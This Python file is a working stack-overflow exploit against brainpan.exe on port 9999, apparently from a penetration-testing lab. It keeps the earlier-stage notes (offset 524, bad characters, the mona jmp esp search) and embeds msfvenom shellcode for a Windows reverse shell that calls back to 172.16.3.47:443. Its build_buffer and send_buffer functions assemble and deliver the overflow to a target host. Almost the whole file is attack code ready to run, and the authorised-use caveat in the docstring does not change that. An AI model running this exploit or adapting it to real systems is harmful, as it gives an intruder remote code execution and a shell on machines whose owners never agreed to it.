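"""Stack-overflow exploit for brainpan.exe (port 9999) - stage 5: shellcode delivery.

The buffer layout was derived in the earlier stages (see the notes kept
below): 524 bytes of filler reach the saved return address, 4 bytes of
``jmp esp`` address redirect execution onto the stack, a short NOP sled
absorbs the landing, then the msfvenom payload, and trailing filler keeps
the total at the 1050 bytes that reproduced the crash.

Offensive-tool caveat: the embedded payload is a reverse shell that calls
back to LHOST=172.16.3.47:443 - regenerate it with msfvenom for your own
listener. The ``jmp esp`` address was found by mona inside brainpan.exe and
is only meaningful for that binary. Use only against systems you are
authorised to test.
"""
import socket
import struct
import sys
from time import sleep  # retained from the original script; not used here

# --- stage 3: find the EIP offset -------------------------------------------
# cp 2-crash.py 3-pattern.py
# updatedb
# locate pattern_create.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_create.rb -l 650
# Kept for reference only; it is no longer sent.
pattern = (
    'Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9'
    'Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9'
    'Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9'
    'Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9'
    'Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9'
    'Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9'
    'Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9'
    'Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9'
    'Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9'
    'Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9'
    'Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9'
    'Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9'
    'Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9'
    'An0An1An2An3An4An5An6An7An8An9'
    'Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9'
    'Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9'
    'Aq0Aq1Aq2Aq3Aq4Aq5Aq6Aq7Aq8Aq9'
    'Ar0Ar1Ar2Ar3Ar4Ar5Ar6Ar7Ar8Ar9'
    'As0As1As2As3As4As5As6As7As8As9'
    'At0At1At2At3At4At5At6At7At8At9'
    'Au0Au1Au2Au3Au4Au5Au6Au7Au8Au9'
    'Av0Av1Av2Av3Av4Av5Av'
)

# --- stage 4: take control of EIP ------------------------------------------
# cp 3-pattern.py 4-control-eip.py
# locate pattern_offset.rb
# /usr/share/metasploit-framework/tools/exploit/pattern_offset.rb -l 650 -q 35724134
# [*] Exact match at offset 524
#
# Buffers that were tried along the way:
#   buffer = 'A' * 600
#   buffer = pattern
#   buffer = 'A' * 524 + 'B' * 4 + 'C' * 122        # 524 + 4 + 122 = 650
#   buffer = 'A' * 524 + 'B' * 4 + 'C' * 522        # 122 + 400 = 522
#   buffer = 'A' * 524 + 'B' * 4 + badchars          # bad-character hunt
#
# Bad characters found: \x00 (so msfvenom was run with -b "\x00").
# The full 0x01..0xff test string lived in ``badchars`` during that stage;
# it is left empty here because that stage is complete.
badchars = b""

# --- stage 5: jmp esp + shellcode ------------------------------------------
# locate nasm_shell.rb
# /usr/share/metasploit-framework/tools/exploit/nasm_shell.rb
# nasm > jmp esp
# 00000000  FFE4              jmp esp
#
# !mona modules
# !mona find -s "\xff\xe4" -m brainpan.exe
# jmp esp at address 311712F3  (written little-endian into the buffer)
#
# msfvenom -p windows/shell_reverse_tcp LHOST=172.16.3.47 LPORT=443 \
#     EXITFUNC=thread -a x86 --platform windows -b "\x00" -f c > shellcode.txt
shellcode = (
    b"\xda\xd2\xd9\x74\x24\xf4\x58\xba\xfa\x27\xd1\x5d\x31\xc9\xb1"
    b"\x52\x31\x50\x17\x03\x50\x17\x83\x3a\x23\x33\xa8\x46\xc4\x31"
    b"\x53\xb6\x15\x56\xdd\x53\x24\x56\xb9\x10\x17\x66\xc9\x74\x94"
    b"\x0d\x9f\x6c\x2f\x63\x08\x83\x98\xce\x6e\xaa\x19\x62\x52\xad"
    b"\x99\x79\x87\x0d\xa3\xb1\xda\x4c\xe4\xac\x17\x1c\xbd\xbb\x8a"
    b"\xb0\xca\xf6\x16\x3b\x80\x17\x1f\xd8\x51\x19\x0e\x4f\xe9\x40"
    b"\x90\x6e\x3e\xf9\x99\x68\x23\xc4\x50\x03\x97\xb2\x62\xc5\xe9"
    b"\x3b\xc8\x28\xc6\xc9\x10\x6d\xe1\x31\x67\x87\x11\xcf\x70\x5c"
    b"\x6b\x0b\xf4\x46\xcb\xd8\xae\xa2\xed\x0d\x28\x21\xe1\xfa\x3e"
    b"\x6d\xe6\xfd\x93\x06\x12\x75\x12\xc8\x92\xcd\x31\xcc\xff\x96"
    b"\x58\x55\x5a\x78\x64\x85\x05\x25\xc0\xce\xa8\x32\x79\x8d\xa4"
    b"\xf7\xb0\x2d\x35\x90\xc3\x5e\x07\x3f\x78\xc8\x2b\xc8\xa6\x0f"
    b"\x4b\xe3\x1f\x9f\xb2\x0c\x60\xb6\x70\x58\x30\xa0\x51\xe1\xdb"
    b"\x30\x5d\x34\x4b\x60\xf1\xe7\x2c\xd0\xb1\x57\xc5\x3a\x3e\x87"
    b"\xf5\x45\x94\xa0\x9c\xbc\x7f\x63\x70\xbd\x50\x13\x73\xc1\xaf"
    b"\x58\xfa\x27\xc5\x8e\xab\xf0\x72\x36\xf6\x8a\xe3\xb7\x2c\xf7"
    b"\x24\x33\xc3\x08\xea\xb4\xae\x1a\x9b\x34\xe5\x40\x0a\x4a\xd3"
    b"\xec\xd0\xd9\xb8\xec\x9f\xc1\x16\xbb\xc8\x34\x6f\x29\xe5\x6f"
    b"\xd9\x4f\xf4\xf6\x22\xcb\x23\xcb\xad\xd2\xa6\x77\x8a\xc4\x7e"
    b"\x77\x96\xb0\x2e\x2e\x40\x6e\x89\x98\x22\xd8\x43\x76\xed\x8c"
    b"\x12\xb4\x2e\xca\x1a\x91\xd8\x32\xaa\x4c\x9d\x4d\x03\x19\x29"
    b"\x36\x79\xb9\xd6\xed\x39\xd9\x34\x27\x34\x72\xe1\xa2\xf5\x1f"
    b"\x12\x19\x39\x26\x91\xab\xc2\xdd\x89\xde\xc7\x9a\x0d\x33\xba"
    b"\xb3\xfb\x33\x69\xb3\x29"
)

OFFSET = 524               # filler bytes before the saved return address
JMP_ESP = 0x311712F3       # "jmp esp" in brainpan.exe (see !mona find above)
NOP_SLED = 32              # NOPs between jmp esp landing and the payload
TOTAL_LEN = 1050           # 524 + 4 + 522: the buffer size that reproduced the crash
TARGET_HOST = '172.16.3.19'
TARGET_PORT = 9999
CONNECT_TIMEOUT = 2


def build_buffer(payload, offset=OFFSET, ret_addr=JMP_ESP,
                 nop_count=NOP_SLED, total_len=TOTAL_LEN):
    """Assemble the overflow buffer: filler | ret addr | NOP sled | payload | tail.

    The tail filler is computed from ``len(payload)`` instead of being a
    hard-coded count (the original had ``'C' * 139`` = 522 - 32 - 351), so a
    regenerated payload of a different length no longer silently shifts the
    total size.

    Args:
        payload: raw shellcode bytes (must already avoid the bad chars).
        offset: bytes of filler before EIP is overwritten.
        ret_addr: 32-bit address written over EIP, packed little-endian.
        nop_count: length of the NOP sled after the return address.
        total_len: total buffer length to emit.

    Returns:
        bytes of exactly ``total_len`` bytes.

    Raises:
        ValueError: if the payload does not fit inside ``total_len``.
    """
    ret = struct.pack('<I', ret_addr)  # little-endian, as noted in the mona output
    tail = total_len - offset - len(ret) - nop_count - len(payload)
    if tail < 0:
        raise ValueError(
            'payload of %d bytes does not fit: %d bytes over' % (len(payload), -tail))
    return b'A' * offset + ret + b'\x90' * nop_count + payload + b'C' * tail


def send_buffer(host, port, data, timeout=CONNECT_TIMEOUT):
    """Connect to ``host:port``, read the banner, send ``data`` + CRLF, close.

    Raises:
        socket.error (OSError on Python 3): on connect/recv/send failure,
        including timeouts. The socket is always closed.
    """
    sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
    sock.settimeout(timeout)
    try:
        sock.connect((host, port))
        sock.recv(1024)  # consume the service banner before sending
        print('[*] Sending buffer.')
        sock.send(data + b'\r\n')
    finally:
        # Original closed only on the happy path; close unconditionally so a
        # failed send does not leak the descriptor.
        sock.close()


def main(argv=None):
    """Entry point: optional ``host [port]`` on the command line, else the defaults."""
    args = sys.argv[1:] if argv is None else argv
    host = args[0] if len(args) > 0 else TARGET_HOST
    port = int(args[1]) if len(args) > 1 else TARGET_PORT
    exploit = build_buffer(shellcode)
    try:
        send_buffer(host, port, exploit)
    except socket.error as exc:
        # Narrowed from a bare ``except:`` (which also swallowed Ctrl-C and
        # SystemExit) and the real cause is printed; exit non-zero so a
        # wrapper script can tell failure from success.
        print('[*] Could not connect to target, exiting.')
        print('[*] %s' % exc)
        sys.exit(1)


if __name__ == '__main__':
    main()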